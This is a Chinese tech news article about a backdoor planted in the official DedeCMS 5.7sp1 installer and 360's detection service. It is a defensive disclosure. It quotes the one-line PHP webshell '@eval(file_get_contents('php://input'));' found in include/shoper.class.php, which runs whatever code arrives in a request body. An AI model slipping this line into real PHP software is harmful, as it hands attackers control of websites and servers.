DedeCMS官方版本惊曝后门 360紧急推出安全检测

安全
日前,织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。为此,360于当天紧急推出DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。

日前,织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。为此,360于当天紧急推出DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。

图1:DedeCms被植入的后门代码

据悉,DedeCMS正广泛应用于众多企业网站、政府网站、高校网站及个人网站上,是国内用户量最大的PHP类CMS系统。360安全工程师分析发现,此次DedeCMS曝出的后门名为"一句话后门",其恶意代码存在于DedeCMS购物车类文件中,凡是调用该购物车类的文件均会触发后门,从而导致整个网站甚至服务器遭黑客进一步控制。

360建议,使用DedeCMS的网站站长应立刻检测include/shoper.class.php文件中是否存在后门代码"@eval(file_get_contents('php://input'));",如存在应删除该行代码,如不存在则证明没有该"一句话后门"。

作为开源软件,DedeCMS此次曝出后门并非个例。因为在国际上,Linux等多款著名的开源软件也曾遭黑客植入后门。不过,乌云漏洞平台公开的织梦官方邮件显示,织梦开发团队否认了产品曾被植入后门,但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。

图2:测试验证PHP代码可被DedeCMS后门执行

 

责任编辑:守望幸福 来源: 51CTO.com
相关推荐

2015-12-25 16:49:52

2023-07-31 09:36:07

Linux官方版本

2013-01-14 12:15:51

2011-06-16 08:51:54

2014-08-27 18:09:05

2011-01-07 09:47:21

Windows 8

2011-08-15 15:41:29

2014-05-04 12:58:10

安全漏洞修复补丁

2023-08-14 19:51:43

2018-01-05 08:53:32

LinuxUbuntu发行版

2016-01-13 10:33:48

飞塔防火墙SSH后门

2013-03-11 17:31:48

华为Emotion UI手机终端

2010-08-19 16:54:25

iPhone360安全产品

2013-11-27 09:25:20

2016-02-22 12:52:51

2023-05-26 09:19:46

OpenAIChatGPT

2023-06-01 19:06:00

2009-04-08 10:55:19

2020-07-08 16:49:57

腾讯云数据库MySQL

2015-11-25 15:00:07

点赞
收藏

51CTO技术栈公众号